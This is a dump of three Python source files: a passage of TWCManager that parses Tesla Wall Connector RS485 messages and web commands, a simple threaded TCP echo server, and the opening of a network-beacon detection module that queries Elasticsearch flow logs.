'~' + "%.2f" % (slaveTWCRoundRobin[i].reportedAmpsActual) +
'~' + str(slaveTWCRoundRobin[i].lastAmpsOffered) +
'~' + str(slaveTWCRoundRobin[i].reportedState)
)
elif(webMsg[0:20] == b'setNonScheduledAmps='):
m = re.search(b'([-0-9]+)', webMsg[19:len(webMsg)])
if(m):
nonScheduledAmpsMax = int(m.group(1))
# Save nonScheduledAmpsMax to SD card so the setting
# isn't lost on power failure or script restart.
save_settings()
elif(webMsg[0:17] == b'setScheduledAmps='):
m = re.search(b'([-0-9]+)\nstartTime=([-0-9]+):([0-9]+)\nendTime=([-0-9]+):([0-9]+)\ndays=([0-9]+)', \
webMsg[17:len(webMsg)], re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
scheduledAmpsStartHour = int(m.group(2)) + (int(m.group(3)) / 60)
scheduledAmpsEndHour = int(m.group(4)) + (int(m.group(5)) / 60)
scheduledAmpsDaysBitmap = int(m.group(6))
save_settings()
elif(webMsg[0:30] == b'setResumeTrackGreenEnergyTime='):
m = re.search(b'([-0-9]+):([0-9]+)', webMsg[30:len(webMsg)], re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = int(m.group(1)) + (int(m.group(2)) / 60)
save_settings()
elif(webMsg[0:11] == b'sendTWCMsg='):
m = re.search(b'([0-9a-fA-F]+)', webMsg[11:len(webMsg)], re.MULTILINE)
if(m):
twcMsg = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
15 if len(slaveTWCRoundRobin) == 0 \
or slaveTWCRoundRobin[0].protocolVersion == 2 else 13)
if((twcMsg[0:2] == b'\xFC\x19') or (twcMsg[0:2] == b'\xFC\x1A')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could permanently disable the TWC. Aborting.\n")
elif((twcMsg[0:2] == b'\xFB\xE8')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could crash the TWC. Aborting.\n")
else:
lastTWCResponseMsg = bytearray();
send_msg(twcMsg)
elif(webMsg == b'getLastTWCMsgResponse'):
if(lastTWCResponseMsg != None and lastTWCResponseMsg != b''):
webResponseMsg = hex_str(lastTWCResponseMsg)
else:
webResponseMsg = 'None'
elif(webMsg[0:20] == b'carApiEmailPassword='):
m = re.search(b'([^\n]+)\n([^\n]+)', webMsg[20:len(webMsg)], re.MULTILINE)
if(m):
queue_background_task({'cmd':'carApiEmailPassword',
'email':m.group(1).decode('ascii'),
'password':m.group(2).decode('ascii')})
elif(webMsg[0:23] == b'setMasterHeartbeatData='):
m = re.search(b'([0-9a-fA-F]*)', webMsg[23:len(webMsg)], re.MULTILINE)
if(m):
if(len(m.group(1)) > 0):
overrideMasterHeartbeatData = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
9 if slaveTWCRoundRobin[0].protocolVersion == 2 else 7)
else:
overrideMasterHeartbeatData = b''
elif(webMsg == b'chargeNow'):
chargeNowAmps = wiringMaxAmpsAllTWCs
chargeNowTimeEnd = now + 60*60*24
elif(webMsg == b'chargeNowCancel'):
chargeNowAmps = 0
chargeNowTimeEnd = 0
elif(webMsg == b'dumpState'):
# dumpState commands are used for debugging. They are called
# using a web page:
# http://(Pi address)/index.php?submit=1&dumpState=1
webResponseMsg = ('time=' + str(now) + ', fakeMaster='
+ str(fakeMaster) + ', rs485Adapter=' + rs485Adapter
+ ', baud=' + str(baud)
+ ', wiringMaxAmpsAllTWCs=' + str(wiringMaxAmpsAllTWCs)
+ ', wiringMaxAmpsPerTWC=' + str(wiringMaxAmpsPerTWC)
+ ', minAmpsPerTWC=' + str(minAmpsPerTWC)
+ ', greenEnergyAmpsOffset=' + str(greenEnergyAmpsOffset)
+ ', debugLevel=' + str(debugLevel)
+ '\n')
webResponseMsg += (
'carApiStopAskingToStartCharging=' + str(carApiStopAskingToStartCharging)
+ '\ncarApiLastStartOrStopChargeTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastStartOrStopChargeTime)))
+ '\ncarApiLastErrorTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastErrorTime)))
+ '\ncarApiTokenExpireTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiTokenExpireTime)))
+ '\n'
)
for vehicle in carApiVehicles:
webResponseMsg += str(vehicle.__dict__) + '\n'
webResponseMsg += 'slaveTWCRoundRobin:\n'
for slaveTWC in slaveTWCRoundRobin:
webResponseMsg += str(slaveTWC.__dict__) + '\n'
numPackets = math.ceil(len(webResponseMsg) / 290)
elif(webMsg[0:14] == b'setDebugLevel='):
m = re.search(b'([-0-9]+)', webMsg[14:len(webMsg)], re.MULTILINE)
if(m):
debugLevel = int(m.group(1))
else:
print(time_now() + ": Unknown IPC request from web server: " + str(webMsg))
if(len(webResponseMsg) > 0):
if(debugLevel >= 5):
print(time_now() + ": Web query response: '" + webResponseMsg + "'")
try:
if(numPackets == 0):
if(len(webResponseMsg) > 290):
webResponseMsg = webResponseMsg[0:290]
webIPCqueue.send(struct.pack('=LH' + str(len(webResponseMsg)) + 's', webMsgTime, webMsgID,
webResponseMsg.encode('ascii')), block=False)
else:
# In this case, block=False prevents blocking if the message
# queue is too full for our message to fit. Instead, an
# error is returned.
msgTemp = struct.pack('=LH1s', webMsgTime, webMsgID, bytearray([numPackets]))
webIPCqueue.send(msgTemp, block=False)
for i in range(0, numPackets):
packet = webResponseMsg[i*290:i*290+290]
webIPCqueue.send(struct.pack('=LH' + str(len(packet)) + 's', webMsgTime, webMsgID,
packet.encode('ascii')), block=False)
except sysv_ipc.BusyError:
print(time_now() + ": Error: IPC queue full when trying to send response to web interface.")
except sysv_ipc.BusyError:
# No web message is waiting.
pass
########################################################################
# See if there's an incoming message on the RS485 interface.
timeMsgRxStart = time.time()
while True:
now = time.time()
dataLen = ser.inWaiting()
if(dataLen == 0):
if(msgLen == 0):
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if(now - timeMsgRxStart >= 2.0):
if(debugLevel >= 9):
print(time_now() + ": Msg timeout (" + hex_str(ignoredData) +
') ' + hex_str(msg[0:msgLen]))
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
dataLen = 1
data = ser.read(dataLen)
if(dataLen != 1):
# This should never happen
print("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if(msgLen == 0 and data[0] != 0xc0):
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
if(debugLevel >= 11):
print("Ignoring byte %02X between messages." % (data[0]))
ignoredData += data
continue
elif(msgLen > 0 and msgLen < 15 and data[0] == 0xc0):
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
if(debugLevel >= 10):
print("Found end of message before full-length message received. " \
"Discard and wait for new message.")
msg = data
msgLen = 1
continue
if(msgLen == 0):
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in send_msg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if(msgLen >= 16 and data[0] == 0xc0):
break
if(msgLen >= 16):
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if(lastTWCResponseMsg == b''
and msg[0:2] != b'\xFB\xE0' and msg[0:2] != b'\xFD\xE0'
and msg[0:2] != b'\xFC\xE1' and msg[0:2] != b'\xFB\xE2'
and msg[0:2] != b'\xFD\xE2' and msg[0:2] != b'\xFB\xEB'
and msg[0:2] != b'\xFD\xEB' and msg[0:2] != b'\xFD\xE0'
):
lastTWCResponseMsg = msg
if(debugLevel >= 9):
print("Rx@" + time_now() + ": (" + hex_str(ignoredData) + ') ' \
+ hex_str(msg) + "")
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if(len(msg) != 14 and len(msg) != 16 and len(msg) != 20):
# In firmware 4.5.3, FD EB (kWh and voltage report), FD ED, FD
# EE, FD EF, FD F1, and FB A4 messages are length 20 while most
# other messages are length 16. I'm not sure if there are any
# length 14 messages remaining.
print(time_now() + ": ERROR: Ignoring message of unexpected length %d: %s" % \
(len(msg), hex_str(msg)))
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if((checksum & 0xFF) != checksumExpected):
print("ERROR: Checksum %X does not match %02X. Ignoring message: %s" %
(checksum, checksumExpected, hex_str(msg)))
continue
if(fakeMaster == 1):
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b'^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(maxAmps >= 80):
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
spikeAmpsToCancel6ALimit = 21
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
spikeAmpsToCancel6ALimit = 16
if(senderID == fakeTWCID):
print(time_now + ": Slave TWC %02X%02X reports same TWCID as master. " \
"Slave should resolve by changing its TWCID." % \
(senderID[0], senderID[1]))
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = new_slave(senderID, maxAmps)
if(slaveTWC.protocolVersion == 1 and slaveTWC.minAmpsTWCSupports == 6):
if(len(msg) == 14):
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif(len(msg) == 16):
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
if(debugLevel >= 1):
print(time_now() + ": Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d." % \
(senderID[0], senderID[1], slaveTWC.protocolVersion, slaveTWC.minAmpsTWCSupports))
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if(slaveTWC.wiringMaxAmps > maxAmps):
print("\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(wiringMaxAmpsPerTWC)
+ " which is greater than the max "
+ str(maxAmps) + " amps your charger says it can handle. " \
"Please review instructions in the source code and consult an " \
"electrician if you don't know what to do.")
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ''
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
print(time_now() + ": ERROR: Received heartbeat message from " \
"slave %02X%02X that we've not met before." % \
(senderID[0], senderID[1]))
continue
if(fakeTWCID == receiverID):
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
if(debugLevel >= 1):
print(time_now() + ": WARNING: Slave TWC %02X%02X status data: " \
"%s sent to unknown TWC %02X%02X." % \
(senderID[0], senderID[1],
hex_str(heartbeatData), receiverID[0], receiverID[1]))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(..)(.+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Since we never send such a message, I don't expect a slave
# to ever send this message to us, but we handle it just in
# case.
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
data = msgMatch.group(3)
if(debugLevel >= 1):
print(time_now() + ": Slave TWC %02X%02X unexpectedly reported kWh and voltage data: %s." % \
(senderID[0], senderID[1],
hex_str(data)))
else:
msgMatch = re.search(b'\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
foundMsgMatch = True
print(time_now() + " ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. " \
"Search installation instruction PDF for 'rotary switch' and set " \
"switch so its arrow points to F on the dial.")
if(foundMsgMatch == False):
print(time_now() + ": *** UNKNOWN MESSAGE FROM SLAVE:" + hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(b'\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready1. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(b'\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready2. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
else:
msgMatch = re.search(b'\A\xfb\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
masterTWCID = senderID
try:
slaveTWC = slaveTWCs[receiverID]
except KeyError:
slaveTWC = new_slave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if(receiverID != fakeTWCID):
# This message was intended for another slave.
# Ignore it.
if(debugLevel >= 11):
print(time_now() + ": Master %02X%02X sent " \
"heartbeat message %s to receiver %02X%02X " \
"that isn't our fake slave." % \
(senderID[0], senderID[1],
hex_str(heartbeatData),
receiverID[0], receiverID[1]))
continue
amps = (slaveHeartbeatData[1] << 8) + slaveHeartbeatData[2]
kWhDelivered += (((240 * (amps/100)) / 1000 / 60 / 60) * (now - timeLastkWhDelivered))
timeLastkWhDelivered = now
if(time.time() - timeLastkWhSaved >= 300.0):
timeLastkWhSaved = now
if(debugLevel >= 9):
print(time_now() + ": Fake slave has delivered %.3fkWh" % \
(kWhDelivered))
save_settings()
if(heartbeatData[0] == 0x07):
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x06):
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
slaveHeartbeatData[1] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[2] = (amps & 0xFF)
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x05 or heartbeatData[0] == 0x08 or heartbeatData[0] == 0x09):
if(((heartbeatData[1] << 8) + heartbeatData[2]) > 0):
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
slaveHeartbeatData[1] = heartbeatData[1]
slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
slaveHeartbeatData[3] = ((ampsUsed >> 8) & 0xFF)
slaveHeartbeatData[4] = (ampsUsed & 0xFF)
elif(heartbeatData[0] == 0):
if(timeTo0Aafter06 > 0 and timeTo0Aafter06 < now):
timeTo0Aafter06 = 0
slaveHeartbeatData[0] = 0x0A
elif(timeToRaise2A > 0 and timeToRaise2A < now):
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
slaveHeartbeatData[0] = 0x0A
elif(heartbeatData[0] == 0x02):
print(time_now() + ": Master heartbeat contains error %ld: %s" % \
(heartbeatData[1], hex_str(heartbeatData)))
else:
print(time_now() + ": UNKNOWN MHB state %s" % \
(hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(slaveHeartbeatData)
else:
msgMatch = re.search(b'\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
if(debugLevel >= 1):
print(time_now() + ": Received 2-hour idle message from Master.")
else:
msgMatch = re.search(b'\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
new_slave(senderID, maxAmps)
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = new_slave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(b'\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage request message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 8):
print(time_now() + ": VRQ from %02X%02X to %02X%02X" % \
(senderID[0], senderID[1], receiverID[0], receiverID[1]))
if(receiverID == fakeTWCID):
kWhCounter = int(kWhDelivered)
kWhPacked = bytearray([((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF)])
print(time_now() + ": VRS %02X%02X: %dkWh (%s) %dV %dV %dV" % \
(fakeTWCID[0], fakeTWCID[1],
kWhCounter, hex_str(kWhPacked), 240, 0, 0))
send_msg(bytearray(b'\xFD\xEB') + fakeTWCID
+ kWhPacked
+ bytearray(b'\x00\xF0\x00\x00\x00\x00\x00'))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(.........+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage response message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 1):
print(time_now() + ": VRS %02X%02X: %dkWh %dV %dV %dV" % \
(senderID[0], senderID[1],
kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC))
if(foundMsgMatch == False):
print(time_now() + ": ***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
print("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
backgroundTasksQueue.join()
ser.close()
#
# End main program
#
##############################
|
server.py | import socket, sys, json
import threading
def threadWork(client,adr):
try:
while True:
msg = client.recv(1024).decode('utf-8')
if not msg:
print("----------------------------------------------")
print(f'client {adr} closed')
print("----------------------------------------------")
break
else:
print ("Client send: " + msg)
client.sendall(("You say: " + msg).encode('utf-8'))
try:
data = json.loads(msg)
if data['channel'] == '00001':
print('name: {}'.format(data['name']))
if data['channel'] == '00002':
print('name: {}'.format(data['name']))
except Exception as e:
print(e)
except Exception as e:
print("----------------------------------------------")
print(e)
print('client {} closed'.format(adr))
print("----------------------------------------------")
client.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', 9999))
sock.listen(5)
print('server start ...')
while True:
(csock, adr) = sock.accept()
print ("Client Info: ", csock, adr)
t = threading.Thread(target=threadWork, args=(csock,adr), daemon=True)
t.start()
sock.close() |
command_control.py | # coding: utf-8
import sys
from flare.tools.utils import bcolors
from flare.base.config import flareConfig
try:
import pandas as pd
except:
print("Please make sure you have pandas installed. pip -r requirements.txt or pip install pandas")
sys.exit(0)
try:
from elasticsearch import Elasticsearch, helpers, RequestsHttpConnection
except:
print("Please make sure you have elasticsearch module installed. pip -r requirements.txt or pip install elasticsearch")
sys.exit(0)
from multiprocessing import Process, JoinableQueue, Lock, Manager
from flare.tools.iputils import private_check, multicast_check, reserved_check
from flare.tools.whoisip import WhoisLookup
import time
import warnings
import os
import datetime
import json
warnings.filterwarnings('ignore')
config_default = os.path.join(os.path.dirname(__file__), '..', '..', 'configs/elasticsearch.ini')
class elasticBeacon(object):
"""
Elastic Beacon is designed to identify periodic communication between
network communicatiors. Future updates will allow for dynamic fields to be passed in.
If you do not allow your elastic search server to communicate externally, you can setup an
ssh tunnel by using ssh -NfL 9200:localhost:9200 username@yourserver
Otherwise, you'll need to adjust es_host to the IP address that is exposed to elasticSearch.
"""
def __init__(self,
config_in=None,
min_occur=10,
min_percent=5,
window=2,
threads=8,
period=24,
min_interval=2,
es_host='localhost',
es_port=9200,
es_timeout=480,
es_index='logstash-flow-*',
kibana_version='4',
verbose=True,
debug=True):
"""
:param min_occur: Minimum number of triads to be considered beaconing
:param min_percent: Minimum percentage of all connection attempts that
must fall within the window to be considered beaconing
:param window: Size of window in seconds in which we group connections to determine percentage, using a
large window size can give inaccurate interval times, multiple windows contain all interesting packets,
so the first window to match is the interval
:param threads: Number of cores to use
:param period: Number of hours to locate beacons for
:param min_interval: Minimum interval betweeen events to consider for beaconing behavior
:param es_host: IP Address of elasticsearch host (default is localhost)
:param es_timeout: Sets timeout to 480 seconds
:param kibana_version: 4 or 5 (query will depend on version)
"""
#self.config_in = config_in
if config_in is not None:
try:
self.config = flareConfig(config_in)
self.es_host = self.config.get('beacon', 'es_host')
self.es_port = int(self.config.get('beacon', 'es_port'))
self.es_index = self.config.get('beacon', 'es_index')
self.use_ssl = self.config.get('beacon', 'use_ssl')
self.MIN_OCCURRENCES = int(self.config.get('beacon','min_occur'))
self.MIN_PERCENT = int(self.config.get('beacon','min_percent'))
self.WINDOW = int(self.config.get('beacon','window'))
self.NUM_PROCESSES = int(self.config.get('beacon','threads'))
